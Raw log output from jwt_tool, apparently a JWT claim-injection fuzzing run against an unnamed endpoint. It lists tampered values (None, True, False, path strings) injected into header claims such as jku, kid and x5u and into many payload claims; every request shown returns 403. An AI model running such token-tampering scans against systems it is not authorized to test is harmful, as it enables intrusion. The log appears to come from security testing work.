jwttool_bf7512e946eba8a6f58bd07ae2ceebb9 Injected /inject_common_c_hash into Payload Claim: c_hash Response Code: 403, 43 bytes
jwttool_aec0ddef5ee14256f73b8d43e00845c9 Injected /inject_common_acr into Payload Claim: acr Response Code: 403, 43 bytes
jwttool_0a67ba8544c38c7bf7344a616c2c4eb9 Injected /inject_common_amr into Payload Claim: amr Response Code: 403, 43 bytes
jwttool_6da0728f952cebf8fe0c716edc74d1c5 Injected /inject_common_sub_jwk into Payload Claim: sub_jwk Response Code: 403, 43 bytes
jwttool_d84877c46a76dedd006295ce0f577407 Injected /inject_common_cnf into Payload Claim: cnf Response Code: 403, 43 bytes
jwttool_75c76e007db6f67b9c098cfd098017f9 Injected /inject_common_sip_from_tag into Payload Claim: sip_from_tag Response Code: 403, 43 bytes
jwttool_8bcfea8250e4767fbb8f3769e6c78b78 Injected /inject_common_sip_date into Payload Claim: sip_date Response Code: 403, 43 bytes
jwttool_f20ae5b75ab19afb0c58a672896e133e Injected /inject_common_sip_callid into Payload Claim: sip_callid Response Code: 403, 43 bytes
jwttool_c50020d9a54906ee89812b0b8da93a04 Injected /inject_common_sip_cseq_num into Payload Claim: sip_cseq_num Response Code: 403, 43 bytes
jwttool_2f35f2725a6b47ac5b3301205f588957 Injected /inject_common_sip_via_branch into Payload Claim: sip_via_branch Response Code: 403, 43 bytes
jwttool_33d57a500b556e71fac56f00248f8bed Injected /inject_common_orig into Payload Claim: orig Response Code: 403, 43 bytes
jwttool_097158c813806e28ad976b62ee71b5b7 Injected /inject_common_dest into Payload Claim: dest Response Code: 403, 43 bytes
jwttool_95c3c9decb6bed6545f854ee6ee06fbc Injected /inject_common_mky into Payload Claim: mky Response Code: 403, 43 bytes
jwttool_ce4b1948fcdc2160c848de429315f1d2 Injected /inject_common_events into Payload Claim: events Response Code: 403, 43 bytes
jwttool_579f73ce0b657c6a7e41031e79ea7f48 Injected /inject_common_toe into Payload Claim: toe Response Code: 403, 43 bytes
jwttool_1b28d0f0e679da0b1af9e2f671e3365c Injected /inject_common_txn into Payload Claim: txn Response Code: 403, 43 bytes
jwttool_7a7bafad9dfb96c4603162d980608381 Injected /inject_common_rph into Payload Claim: rph Response Code: 403, 43 bytes
jwttool_5b346a079a46f69c4d081c69134960bd Injected /inject_common_sid into Payload Claim: sid Response Code: 403, 43 bytes
jwttool_64ce868a8ad6af50e68bd0be13fc680f Injected /inject_common_vot into Payload Claim: vot Response Code: 403, 43 bytes
jwttool_e1be071c08dcdd4b81b4c18110dc9096 Injected /inject_common_vtm into Payload Claim: vtm Response Code: 403, 43 bytes
jwttool_c32bfa53d2e74bc07433e52474d7a55b Injected /inject_common_attest into Payload Claim: attest Response Code: 403, 43 bytes
jwttool_bdb7ae6f0602ba0c2d471c0c35727c6f Injected /inject_common_origid into Payload Claim: origid Response Code: 403, 43 bytes
jwttool_cb6a043bebc1fb2b0335fbfc13ecc6ac Injected /inject_common_act into Payload Claim: act Response Code: 403, 43 bytes
jwttool_0396de1e7bd3d278b4a64e24663e358f Injected /inject_common_scope into Payload Claim: scope Response Code: 403, 43 bytes
jwttool_ce744ac67749868f635c6a7b6f4eb1d2 Injected /inject_common_client_id into Payload Claim: client_id Response Code: 403, 43 bytes
jwttool_097884107cf0c31dc1b62d346d2b0c23 Injected /inject_common_may_act into Payload Claim: may_act Response Code: 403, 43 bytes
jwttool_7b6af85f7b6abcee17ed784abb2a1ab1 Injected /inject_common_jcard into Payload Claim: jcard Response Code: 403, 43 bytes
jwttool_aaacc45b30de1cdc5cf6e076428193ee Injected /inject_common_at_use_nbr into Payload Claim: at_use_nbr Response Code: 403, 43 bytes
jwttool_2803ce8e325566436f870aec9818006e Injected /inject_common_div into Payload Claim: div Response Code: 403, 43 bytes
jwttool_cf08d4348355c462f7b40eca52b6b92d Injected /inject_common_opt into Payload Claim: opt Response Code: 403, 43 bytes
jwttool_412435dc5788bcdb52da9c20c48ec053 Injected None into Common Header Claim: typ Response Code: 403, 43 bytes
jwttool_21b41d72400b4ad5fe1d248ad1df1d9e Injected None into Common Header Claim: jku Response Code: 403, 43 bytes
jwttool_70acf5035a969f081a2ec80fc75677cf Injected None into Common Header Claim: kid Response Code: 403, 43 bytes
jwttool_341c53153aac1cf28ffb9bbdc6463e4c Injected None into Common Header Claim: x5u Response Code: 403, 43 bytes
jwttool_3496bc1ab894b1f3167ed917853c0199 Injected None into Common Header Claim: x5t Response Code: 403, 43 bytes
jwttool_5593e95c96949c1121c9ed162efc4366 Injected None into Common Payload Claim: iss Response Code: 403, 43 bytes
jwttool_37ca3570ecf6626329c2a521ec839b36 Injected None into Common Payload Claim: sub Response Code: 403, 43 bytes
jwttool_a092f31dec205cdad03a3b82c9a0cdb6 Injected None into Common Payload Claim: aud Response Code: 403, 43 bytes
jwttool_59bb508ddcd0ab68df5f1f8660ca816c Injected None into Common Payload Claim: exp Response Code: 403, 43 bytes
jwttool_20e32b0e48e815abb89db7b14899ff92 Injected None into Common Payload Claim: nbf Response Code: 403, 43 bytes
jwttool_5e97312b14bfe7b6b6be444d0bf38b10 Injected None into Common Payload Claim: iat Response Code: 403, 43 bytes
jwttool_2fece9d78a2957440328d8a1d58cc9b9 Injected None into Common Payload Claim: jti Response Code: 403, 43 bytes
jwttool_cf32adf56de593cfde5f7bfcc34d9ca3 Injected None into Common Payload Claim: name Response Code: 403, 43 bytes
jwttool_be4f0a00474450a3df3943fbb42a63a4 Injected None into Common Payload Claim: given_name Response Code: 403, 43 bytes
jwttool_576f99f067085fa25b88f6b1f42af12a Injected None into Common Payload Claim: family_name Response Code: 403, 43 bytes
jwttool_ed4b8c9348d698718082bbb3250c89e7 Injected None into Common Payload Claim: middle_name Response Code: 403, 43 bytes
jwttool_0faf72c60314f97ea4c1aa66ee593fdc Injected None into Common Payload Claim: nickname Response Code: 403, 43 bytes
jwttool_d5972f553eac37d01e5c163a9a797fc8 Injected None into Common Payload Claim: preferred_username Response Code: 403, 43 bytes
jwttool_cfa562b1c3337c325d5b8f3826744ab7 Injected None into Common Payload Claim: profile Response Code: 403, 43 bytes
jwttool_2dc7879e7a44074ed4cb892bcf0f5f40 Injected None into Common Payload Claim: picture Response Code: 403, 43 bytes
jwttool_0adeecab2af9a905bbc1a09671e6d0e6 Injected None into Common Payload Claim: website Response Code: 403, 43 bytes
jwttool_885e8f6f220dcc3b6e483b50d78b41af Injected None into Common Payload Claim: email Response Code: 403, 43 bytes
jwttool_9c66cc296c3edd84b5aef1b4037abf6c Injected None into Common Payload Claim: email_verified Response Code: 403, 43 bytes
jwttool_9da260993442e9edd20cb2a81c8c2c78 Injected None into Common Payload Claim: gender Response Code: 403, 43 bytes
jwttool_f83c428dd18f0355b8fd3533862f96b3 Injected None into Common Payload Claim: birthdate Response Code: 403, 43 bytes
jwttool_a703591bee9586a8e086770c57b552b4 Injected None into Common Payload Claim: zoneinfo Response Code: 403, 43 bytes
jwttool_9a0afb4aa8c6b4d2c3ebcfdbb7e5e46e Injected None into Common Payload Claim: locale Response Code: 403, 43 bytes
jwttool_fc4b51c361ba8d7cca45805425749c7c Injected None into Common Payload Claim: phone_number Response Code: 403, 43 bytes
jwttool_91442033f73a10abdc87ac968dd955f9 Injected None into Common Payload Claim: phone_number_verified Response Code: 403, 43 bytes
jwttool_8271b472a65fcac54a7449048126b6c2 Injected None into Common Payload Claim: address Response Code: 403, 43 bytes
jwttool_7a6d445f80aa0fd662a14b5b8e9211f5 Injected None into Common Payload Claim: updated_at Response Code: 403, 43 bytes
jwttool_824f12acc6f207675009f795b847b157 Injected None into Common Payload Claim: azp Response Code: 403, 43 bytes
jwttool_921dfce7580a19350cc07d3c8cb2404d Injected None into Common Payload Claim: nonce Response Code: 403, 43 bytes
jwttool_1a1c5a44b13df88b5470931cc418b354 Injected None into Common Payload Claim: auth_time Response Code: 403, 43 bytes
jwttool_f1d42b3ba92fadc7fffda77f550dc74c Injected None into Common Payload Claim: at_hash Response Code: 403, 43 bytes
jwttool_fbf138b7499045b6abc3cf3fc3531b8f Injected None into Common Payload Claim: c_hash Response Code: 403, 43 bytes
jwttool_3185fc4a8503ed524a0f9e6d2f0fafb3 Injected None into Common Payload Claim: acr Response Code: 403, 43 bytes
jwttool_7a6927d2f2d8d8a3b5c6340cd6ffa90f Injected None into Common Payload Claim: amr Response Code: 403, 43 bytes
jwttool_b5cb8943870e239115fdacf66e2c69fe Injected None into Common Payload Claim: sub_jwk Response Code: 403, 43 bytes
jwttool_149b3213b43bc359eea2e3b0edc54ddb Injected None into Common Payload Claim: cnf Response Code: 403, 43 bytes
jwttool_c2e6980cb6076b2a9cdb4d3bc4068d02 Injected None into Common Payload Claim: sip_from_tag Response Code: 403, 43 bytes
jwttool_66f81f532eaa65c240f2dfc71e419909 Injected None into Common Payload Claim: sip_date Response Code: 403, 43 bytes
jwttool_2eb0dd527d6e7117f955d478d305c21a Injected None into Common Payload Claim: sip_callid Response Code: 403, 43 bytes
jwttool_31fff59a163b928fbbd26791c8000398 Injected None into Common Payload Claim: sip_cseq_num Response Code: 403, 43 bytes
jwttool_4341b08a22caac8298b9b44c2136c28e Injected None into Common Payload Claim: sip_via_branch Response Code: 403, 43 bytes
jwttool_116c973387ee9c6546749ab194bec638 Injected None into Common Payload Claim: orig Response Code: 403, 43 bytes
jwttool_6dd44594f33b1d4641fa5d84aad55996 Injected None into Common Payload Claim: dest Response Code: 403, 43 bytes
jwttool_3bc501b297fc9ca888fc39178989d0a1 Injected None into Common Payload Claim: mky Response Code: 403, 43 bytes
jwttool_8d0f39e9f4adecca3cba2403424b529d Injected None into Common Payload Claim: events Response Code: 403, 43 bytes
jwttool_ec871de81670b751de3ffacfe102f012 Injected None into Common Payload Claim: toe Response Code: 403, 43 bytes
jwttool_6ed0f73f1037f7e0cedf7dcd635615b0 Injected None into Common Payload Claim: txn Response Code: 403, 43 bytes
jwttool_63c6225cf4fa7e1d362d8c01731b5e31 Injected None into Common Payload Claim: rph Response Code: 403, 43 bytes
jwttool_263faef1ae22f61ac5b5453b87bc1259 Injected None into Common Payload Claim: sid Response Code: 403, 43 bytes
jwttool_8e524d33b5590783149c33946b2529e3 Injected None into Common Payload Claim: vot Response Code: 403, 43 bytes
jwttool_0912caed679c9393c781c6849343d612 Injected None into Common Payload Claim: vtm Response Code: 403, 43 bytes
jwttool_e82981e9de255cd1a1c0ff4d8d3bc345 Injected None into Common Payload Claim: attest Response Code: 403, 43 bytes
jwttool_16c8919f31bce975ad258139066e53e5 Injected None into Common Payload Claim: origid Response Code: 403, 43 bytes
jwttool_98401b102e2a40512fd68f4db2cc169a Injected None into Common Payload Claim: act Response Code: 403, 43 bytes
jwttool_982335f3fbc555a4aaa23dcceee8a792 Injected None into Common Payload Claim: scope Response Code: 403, 43 bytes
jwttool_4914942018514f3589d7036e2eda627c Injected None into Common Payload Claim: client_id Response Code: 403, 43 bytes
jwttool_e7b46e3bb45d65076f42ff11f31e5316 Injected None into Common Payload Claim: may_act Response Code: 403, 43 bytes
jwttool_07c0a35a299f0b4adb76cfb33ed6c9aa Injected None into Common Payload Claim: jcard Response Code: 403, 43 bytes
jwttool_272303d1e08494f93a9db57407945d18 Injected None into Common Payload Claim: at_use_nbr Response Code: 403, 43 bytes
jwttool_30f6ee1ebff15f092c7642a200f0722c Injected None into Common Payload Claim: div Response Code: 403, 43 bytes
jwttool_6e1c99b4846c36fe87d52d2e228919d2 Injected None into Common Payload Claim: opt Response Code: 403, 43 bytes
jwttool_56b7bacab86ff37ece3b485c410875eb Injected True into Common Header Claim: typ Response Code: 403, 43 bytes
jwttool_9534b885df82a6e458f05b09ade31526 Injected True into Common Header Claim: jku Response Code: 403, 43 bytes
jwttool_9ee113d18c4ba17a845225778e229503 Injected True into Common Header Claim: kid Response Code: 403, 43 bytes
jwttool_ae75d0133dfe211517d8738af7b21fcc Injected True into Common Header Claim: x5u Response Code: 403, 43 bytes
jwttool_f6672d3a3e6247a95a140edc06bd4a1f Injected True into Common Header Claim: x5t Response Code: 403, 43 bytes
jwttool_be58b9a4f2746e61602d1eb53b0f9703 Injected True into Common Payload Claim: iss Response Code: 403, 43 bytes
jwttool_10b0b8f70f9533c3970fae198ccfdab3 Injected True into Common Payload Claim: sub Response Code: 403, 43 bytes
jwttool_413eb113faf371f23a957fcef862316b Injected True into Common Payload Claim: aud Response Code: 403, 43 bytes
jwttool_c9fa8fbefc40ee5de3730e55093a4e35 Injected True into Common Payload Claim: exp Response Code: 403, 43 bytes
jwttool_e2882fc6b41a06cbeb825be9ef07173b Injected True into Common Payload Claim: nbf Response Code: 403, 43 bytes
jwttool_c37c87d0adeb2b818b257e443de85e11 Injected True into Common Payload Claim: iat Response Code: 403, 43 bytes
jwttool_a5fc62439489d99bd11d9891c2a26ced Injected True into Common Payload Claim: jti Response Code: 403, 43 bytes
jwttool_164b0ad56de213b6417ed95caa149209 Injected True into Common Payload Claim: name Response Code: 403, 43 bytes
jwttool_88334784dfcb600543afc1afa37b4b59 Injected True into Common Payload Claim: given_name Response Code: 403, 43 bytes
jwttool_8fede585930363e55890d8b33bbc8bd1 Injected True into Common Payload Claim: family_name Response Code: 403, 43 bytes
jwttool_bc0505a021aa32eb3a0bd5a605681743 Injected True into Common Payload Claim: middle_name Response Code: 403, 43 bytes
jwttool_5d89a42cc7d7ab1edb527005894e8bad Injected True into Common Payload Claim: nickname Response Code: 403, 43 bytes
jwttool_a4dad63a5511811f6500d404e72c2220 Injected True into Common Payload Claim: preferred_username Response Code: 403, 43 bytes
jwttool_87625c9147113826cd1065e328d6fed8 Injected True into Common Payload Claim: profile Response Code: 403, 43 bytes
jwttool_c74f69438f1dde5ee292e454ad137d0b Injected True into Common Payload Claim: picture Response Code: 403, 43 bytes
jwttool_c1ceb41004fb5f56070e2332c64a49e1 Injected True into Common Payload Claim: website Response Code: 403, 43 bytes
jwttool_ecb72c6a16d23b2fcf7db698a2d9994a Injected True into Common Payload Claim: email Response Code: 403, 43 bytes
jwttool_09ec683ea2b276ef374635acca807a6a Injected True into Common Payload Claim: email_verified Response Code: 403, 43 bytes
jwttool_98d32201ca3f0c8e05f6f016af5499fe Injected True into Common Payload Claim: gender Response Code: 403, 43 bytes
jwttool_f8b12e912e88c2368f953eff7c9f2a1c Injected True into Common Payload Claim: birthdate Response Code: 403, 43 bytes
jwttool_214f34c292c746d2522e42b4fbe182b3 Injected True into Common Payload Claim: zoneinfo Response Code: 403, 43 bytes
jwttool_f1696b23a96714d7511c8fbc845efc16 Injected True into Common Payload Claim: locale Response Code: 403, 43 bytes
jwttool_e8c48516bdb2fec92182c331c5092159 Injected True into Common Payload Claim: phone_number Response Code: 403, 43 bytes
jwttool_11ef44a83828c743133a07de464db387 Injected True into Common Payload Claim: phone_number_verified Response Code: 403, 43 bytes
jwttool_6d1a1531a0258fc6423abb6a8b86c584 Injected True into Common Payload Claim: address Response Code: 403, 43 bytes
jwttool_82715a3d8614ad1810a304379350b16b Injected True into Common Payload Claim: updated_at Response Code: 403, 43 bytes
jwttool_d86a9c6f94f7a81556b53154e8a5c1ef Injected True into Common Payload Claim: azp Response Code: 403, 43 bytes
jwttool_87c4ce61f02579b7333bed31d0255818 Injected True into Common Payload Claim: nonce Response Code: 403, 43 bytes
jwttool_c5e5c25569a9aab713dfeba52e80bf72 Injected True into Common Payload Claim: auth_time Response Code: 403, 43 bytes
jwttool_689631a3443a8acbeccf1990affa9c4a Injected True into Common Payload Claim: at_hash Response Code: 403, 43 bytes
jwttool_5ff813afd8301f7772f5ae5d2b09b3a2 Injected True into Common Payload Claim: c_hash Response Code: 403, 43 bytes
jwttool_2a90fde73b543acfdfdfbf800eaf010c Injected True into Common Payload Claim: acr Response Code: 403, 43 bytes
jwttool_da2b3717cbbdbb1d9faabc33248c5b08 Injected True into Common Payload Claim: amr Response Code: 403, 43 bytes
jwttool_a3c67e5f140500031267b823e3e8d130 Injected True into Common Payload Claim: sub_jwk Response Code: 403, 43 bytes
jwttool_825a4a1a4f5b75832c523752e866f500 Injected True into Common Payload Claim: cnf Response Code: 403, 43 bytes
jwttool_cba4fcda222d4f59a66eae27af1b463a Injected True into Common Payload Claim: sip_from_tag Response Code: 403, 43 bytes
jwttool_345447f5ae3f6001ba1c23a38bb82fdf Injected True into Common Payload Claim: sip_date Response Code: 403, 43 bytes
jwttool_946a116e6817613b982eab850a21c129 Injected True into Common Payload Claim: sip_callid Response Code: 403, 43 bytes
jwttool_283c7829711dc64bf6d4da5956cbc158 Injected True into Common Payload Claim: sip_cseq_num Response Code: 403, 43 bytes
jwttool_76994adbefaa5dd005236092cc7e99e5 Injected True into Common Payload Claim: sip_via_branch Response Code: 403, 43 bytes
jwttool_01527b7f0a8788f62bc75687108809de Injected True into Common Payload Claim: orig Response Code: 403, 43 bytes
jwttool_d89c6f13844143bfcef043855d0147eb Injected True into Common Payload Claim: dest Response Code: 403, 43 bytes
jwttool_5820ce50ee9abac85336e3a56c796c88 Injected True into Common Payload Claim: mky Response Code: 403, 43 bytes
jwttool_06ad902e4072551828f1a8583d16d794 Injected True into Common Payload Claim: events Response Code: 403, 43 bytes
jwttool_a64062250754c73f0138c8958c044206 Injected True into Common Payload Claim: toe Response Code: 403, 43 bytes
jwttool_0d4a835a2f23b62280114068762ffd3a Injected True into Common Payload Claim: txn Response Code: 403, 43 bytes
jwttool_6c4a75536210c781f08eefc1fafb7518 Injected True into Common Payload Claim: rph Response Code: 403, 43 bytes
jwttool_726df51f1e84332718c6cc5f8cd964d3 Injected True into Common Payload Claim: sid Response Code: 403, 43 bytes
jwttool_e7c3b27b041f2e2792f57cbbb10cc849 Injected True into Common Payload Claim: vot Response Code: 403, 43 bytes
jwttool_1f3013f8942c7c3781e36dce38bd5189 Injected True into Common Payload Claim: vtm Response Code: 403, 43 bytes
jwttool_4e50b10de683dd9832f646b95b6d08e9 Injected True into Common Payload Claim: attest Response Code: 403, 43 bytes
jwttool_d7731e7967a9a3a1b22010c82873e7c7 Injected True into Common Payload Claim: origid Response Code: 403, 43 bytes
jwttool_6683166adfed683adeae6cb4aef8d493 Injected True into Common Payload Claim: act Response Code: 403, 43 bytes
jwttool_19ae07744acea1ca5fe566a5f3902f05 Injected True into Common Payload Claim: scope Response Code: 403, 43 bytes
jwttool_ab6890b6dce94e23997b8027f9d99f47 Injected True into Common Payload Claim: client_id Response Code: 403, 43 bytes
jwttool_cae4fbf4ae8219078609ce971c811ccb Injected True into Common Payload Claim: may_act Response Code: 403, 43 bytes
jwttool_6444f975feb910e4ca92058241d6dcae Injected True into Common Payload Claim: jcard Response Code: 403, 43 bytes
jwttool_da8c3b833dce6adbfdd063137e553d83 Injected True into Common Payload Claim: at_use_nbr Response Code: 403, 43 bytes
jwttool_817a4bb072447ee456ff7b263d40dd98 Injected True into Common Payload Claim: div Response Code: 403, 43 bytes
jwttool_93104601c0a7df9611388f65c47ebf3b Injected True into Common Payload Claim: opt Response Code: 403, 43 bytes
jwttool_912e9d8d534ade0ac3313c7c0455992a Injected False into Common Header Claim: typ Response Code: 403, 43 bytes
jwttool_fe460ce2772e98ad7e2ae11bf5fea176 Injected False into Common Header Claim: jku Response Code: 403, 43 bytes
jwttool_46eb462ad12d3ee62240d58479a3071b Injected False into Common Header Claim: kid Response Code: 403, 43 bytes
jwttool_ee340d73010c5cf1db5e3e29034bd673 Injected False into Common Header Claim: x5u Response Code: 403, 43 bytes
jwttool_a44f3f8132e324bb979b9e3f00999246 Injected False into Common Header Claim: x5t Response Code: 403, 43 bytes
jwttool_50adf9af0ec0f944bf9656decc9a0060 Injected False into Common Payload Claim: iss Response Code: 403, 43 bytes
jwttool_d86cb65968aa54ac06731db8a53562a0 Injected False into Common Payload Claim: sub Response Code: 403, 43 bytes
jwttool_a641aef9bc376b5c17a97d5fa1e1630e Injected False into Common Payload Claim: aud Response Code: 403, 43 bytes
jwttool_9a6324554f4b01755336dab443f554aa Injected False into Common Payload Claim: exp Response Code: 403, 43 bytes
jwttool_fdba5e224d5e560a2e138f94bb5f91a4 Injected False into Common Payload Claim: nbf Response Code: 403, 43 bytes
jwttool_5df4d849d12e021bca80d68e59da431a Injected False into Common Payload Claim: iat Response Code: 403, 43 bytes
jwttool_fc537505e92c0e0c3adff78226714504 Injected False into Common Payload Claim: jti Response Code: 403, 43 bytes
jwttool_9d1b2453f0e2d4f2880b2a19601e432b Injected False into Common Payload Claim: name Response Code: 403, 43 bytes
jwttool_788cf6ca04e6f4d7d056cf3f45e26796 Injected False into Common Payload Claim: given_name Response Code: 403, 43 bytes
jwttool_061811e20dabd16cb3beba6bd8739c0a Injected False into Common Payload Claim: family_name Response Code: 403, 43 bytes
jwttool_9024874ed0a97855cb81bd19cdb51fb3 Injected False into Common Payload Claim: middle_name Response Code: 403, 43 bytes
jwttool_64090d15952e1ae3ed1963859f086ce9 Injected False into Common Payload Claim: nickname Response Code: 403, 43 bytes
jwttool_9e8237729bb86ef2de5f8c735a3e9022 Injected False into Common Payload Claim: preferred_username Response Code: 403, 43 bytes
jwttool_9291b491b03b1616a46e5bc4e084e179 Injected False into Common Payload Claim: profile Response Code: 403, 43 bytes
jwttool_fb14a44368846bbc87615b5ea74838fc Injected False into Common Payload Claim: picture Response Code: 403, 43 bytes
jwttool_0bbff142c0c75f162dc55848efc8db24 Injected False into Common Payload Claim: website Response Code: 403, 43 bytes
jwttool_071e37053ddf6b3db1bc9de9e6744c2b Injected False into Common Payload Claim: email Response Code: 403, 43 bytes
jwttool_97b6dc52e781e28aad0734aedfa716f9 Injected False into Common Payload Claim: email_verified Response Code: 403, 43 bytes
jwttool_bb28450f674fa7c9b5527d14ffb0a9c6 Injected False into Common Payload Claim: gender Response Code: 403, 43 bytes
jwttool_f943b1fd5555bf04fbeb372130fbacd1 Injected False into Common Payload Claim: birthdate Response Code: 403, 43 bytes
jwttool_591c85d16cfc2f8e4bcc5100f86e0bb9 Injected False into Common Payload Claim: zoneinfo Response Code: 403, 43 bytes
jwttool_62c4739efed71efa52a595ec5c54d87e Injected False into Common Payload Claim: locale Response Code: 403, 43 bytes
jwttool_c3b19da7b2421e2ca7adf31ee20be1f0 Injected False into Common Payload Claim: phone_number Response Code: 403, 43 bytes
jwttool_45f5e88e71f48d915e9e38038c26c649 Injected False into Common Payload Claim: phone_number_verified Response Code: 403, 43 bytes
jwttool_b54e80891a4cc78c6c2b6448412f98d1 Injected False into Common Payload Claim: address Response Code: 403, 43 bytes
jwttool_763a8da333c52ddd937150f1aca1b8e1 Injected False into Common Payload Claim: updated_at Response Code: 403, 43 bytes
jwttool_b36ed12ff1fa440be3e6878abd65612d Injected False into Common Payload Claim: azp Response Code: 403, 43 bytes
jwttool_0ef3b46fcc7b95f94254a69862ecee64 Injected False into Common Payload Claim: nonce Response Code: 403, 43 bytes
jwttool_705859d8cd152795d1c7b76ccd9515e8 Injected False into Common Payload Claim: auth_time Response Code: 403, 43 bytes
jwttool_b1e1c353b1696b615e6829b4f6d73d40 Injected False into Common Payload Claim: at_hash Response Code: 403, 43 bytes
jwttool_4e2efb402cb5909e4bc6ce61b383517a Injected False into Common Payload Claim: c_hash Response Code: 403, 43 bytes
jwttool_0423b1591de9868f5166257951b639f0 Injected False into Common Payload Claim: acr Response Code: 403, 43 bytes
jwttool_0b1f1653313a99966bc1add81accef96 Injected False into Common Payload Claim: amr Response Code: 403, 43 bytes
jwttool_4c5d227c4b852c0a0aea265ac959299b Injected False into Common Payload Claim: sub_jwk Response Code: 403, 43 bytes
jwttool_48e9dd7effc2dd92ad229cb6a9e6ee39 Injected False into Common Payload Claim: cnf Response Code: 403, 43 bytes
jwttool_98c06f6f7c6ca6f40a10e6d36759f06c Injected False into Common Payload Claim: sip_from_tag Response Code: 403, 43 bytes
jwttool_f5fc037de660b6596a75962f111f396b Injected False into Common Payload Claim: sip_date Response Code: 403, 43 bytes
jwttool_024179e0de1bb279357b961d932cb7a0 Injected False into Common Payload Claim: sip_callid Response Code: 403, 43 bytes
jwttool_98040e9c7a76cd4e24a39537fca5093a Injected False into Common Payload Claim: sip_cseq_num Response Code: 403, 43 bytes
jwttool_6102c21dfde0000f91552bbe904b8b21 Injected False into Common Payload Claim: sip_via_branch Response Code: 403, 43 bytes
jwttool_30f1d2ad5b0f52312bef2c380948d621 Injected False into Common Payload Claim: orig Response Code: 403, 43 bytes
jwttool_da695167243ba2c84b11639edd26f38b Injected False into Common Payload Claim: dest Response Code: 403, 43 bytes
jwttool_1dc47603b4913adcb9fb236b33ccac17 Injected False into Common Payload Claim: mky Response Code: 403, 43 bytes
jwttool_fb3423ddb59ce94bc2ead6425747e1dc Injected False into Common Payload Claim: events Response Code: 403, 43 bytes
jwttool_436b2604047215526d4a3f0d4a019ade Injected False into Common Payload Claim: toe Response Code: 403, 43 bytes
jwttool_0a7c9d6f3233b94515a672814a4d0a17 Injected False into Common Payload Claim: txn Response Code: 403, 43 bytes
jwttool_02d87ef6a9376255c94cd8b0c3dd7871 Injected False into Common Payload Claim: rph Response Code: 403, 43 bytes
jwttool_d49c0c1d96f7dd8cba2ba94112601207 Injected False into Common Payload Claim: sid Response Code: 403, 43 bytes
jwttool_f540f97ab6fc7e8a0cc1378244cdcabc Injected False into Common Payload Claim: vot Response Code: 403, 43 bytes
jwttool_778ff26fa71f9c2b3821f766d083efdd Injected False into Common Payload Claim: vtm Response Code: 403, 43 bytes
jwttool_0e2dba1d29abb1c879f3dea0ed23f828 Injected False into Common Payload Claim: attest Response Code: 403, 43 bytes
jwttool_50a8c37368b65fc0fd3ed9a99a3730d5 Injected False into Common Payload Claim: origid Response Code: 403, 43 bytes
jwttool_cfa842b29e2377c3c07bb7bebaaa3fb3 Injected False into Common Payload Claim: act Response Code: 403, 43 bytes
jwttool_1a1c1c01a5237bc345cb329c351ad121 Injected False into Common Payload Claim: scope Response Code: 403, 43 bytes
jwttool_5ba5b182f3628bfac3f70aa1b1ff0a9e Injected False into Common Payload Claim: client_id Response Code: 403, 43 bytes
jwttool_156aa259c82b3fd5dce58f4df3d15c56 Injected False into Common Payload Claim: may_act Response Code: 403, 43 bytes
jwttool_e2a5d9edd5e70e8354f764d58271deb3 Injected False into Common Payload Claim: jcard Response Code: 403, 43 bytes
jwttool_97057aac7c11c9e81703e22eae197d49 Injected False into Common Payload Claim: at_use_nbr Response Code: 403, 43 bytes
jwttool_a98d17263e5cd45c85644b469d3e2fdc Injected False into Common Payload Claim: div Response Code: 403, 43 bytes
jwttool_b6894ee9dfd6d47b847cab646a6a2d09 Injected False into Common Payload Claim: opt Response Code: 403, 43 bytes
jwttool_a77df295f4ac29d6cdc4d58308345c21 Injected jwt_tool into Common Header Claim: typ Response Code: 403, 43 bytes
jwttool_10a1ae55678e05dd19fcfe15f521d8b2 Injected jwt_tool into Common Header Claim: jku Response Code: 403, 43 bytes
jwttool_b9e530fc24d0590ae2559a5a2858dfc2 Injected jwt_tool into Common Header Claim: kid Response Code: 403, 43 bytes
jwttool_d76b1c5f2e9f0b25a1d6699ae7539296 Injected jwt_tool into Common Header Claim: x5u Response Code: 403, 43 bytes
jwttool_b0f64b5a87eded53510c5bae48caabca Injected jwt_tool into Common Header Claim: x5t Response Code: 403, 43 bytes
jwttool_1a21238153bf4b97bf45781fa304249a Injected jwt_tool into Common Payload Claim: iss Response Code: 403, 43 bytes
jwttool_52ab9961ba2be5708b71affeb9acd8a2 Injected jwt_tool into Common Payload Claim: sub Response Code: 403, 43 bytes
jwttool_70f86874925527b25602b896c7cbf911 Injected jwt_tool into Common Payload Claim: aud Response Code: 403, 43 bytes
jwttool_1bacaf3cc478455afdda0ec39bc2c78d Injected jwt_tool into Common Payload Claim: exp Response Code: 403, 43 bytes
jwttool_6647c0f8d03d93e05cc7574dae8984bb Injected jwt_tool into Common Payload Claim: nbf Response Code: 403, 43 bytes
jwttool_23cec0291026873b968b35e54d7ee4ea Injected jwt_tool into Common Payload Claim: iat Response Code: 403, 43 bytes
jwttool_838d5555200827135b913cbc3d5123a3 Injected jwt_tool into Common Payload Claim: jti Response Code: 403, 43 bytes
jwttool_11250595d282067e29d132fba5afb9d4 Injected jwt_tool into Common Payload Claim: name Response Code: 403, 43 bytes
jwttool_b71f8328fbd4b4b831feb459606e38fa Injected jwt_tool into Common Payload Claim: given_name Response Code: 403, 43 bytes
jwttool_bb2a1fddbbba58ef52ec5b441687629b Injected jwt_tool into Common Payload Claim: family_name Response Code: 403, 43 bytes
jwttool_3eaef49c2d7c8a5a7d2ac44e456fc113 Injected jwt_tool into Common Payload Claim: middle_name Response Code: 403, 43 bytes
jwttool_a209168693cd3af9ab22e6e8d1c7be5b Injected jwt_tool into Common Payload Claim: nickname Response Code: 403, 43 bytes
jwttool_b5aa1f501816fc3943f9040cdce81417 Injected jwt_tool into Common Payload Claim: preferred_username Response Code: 403, 43 bytes
jwttool_77bed657b5a8fd879fd1ddf66ffbaa49 Injected jwt_tool into Common Payload Claim: profile Response Code: 403, 43 bytes
jwttool_f1f6aec697b41ffa6e124e91bb914387 Injected jwt_tool into Common Payload Claim: picture Response Code: 403, 43 bytes
jwttool_c2fb7d302bc717bc0acdf7a5d761e91a Injected jwt_tool into Common Payload Claim: website Response Code: 403, 43 bytes
jwttool_980a6b51672b62b4da963cbc3f55783e Injected jwt_tool into Common Payload Claim: email Response Code: 403, 43 bytes
jwttool_efea37dfa04c9d56c6d4393d464e6d21 Injected jwt_tool into Common Payload Claim: email_verified Response Code: 403, 43 bytes
jwttool_29bcfbc4d6ac4c98da7b5a2c42aa88a6 Injected jwt_tool into Common Payload Claim: gender Response Code: 403, 43 bytes
jwttool_635454a3f018639791f467454f53f89b Injected jwt_tool into Common Payload Claim: birthdate Response Code: 403, 43 bytes
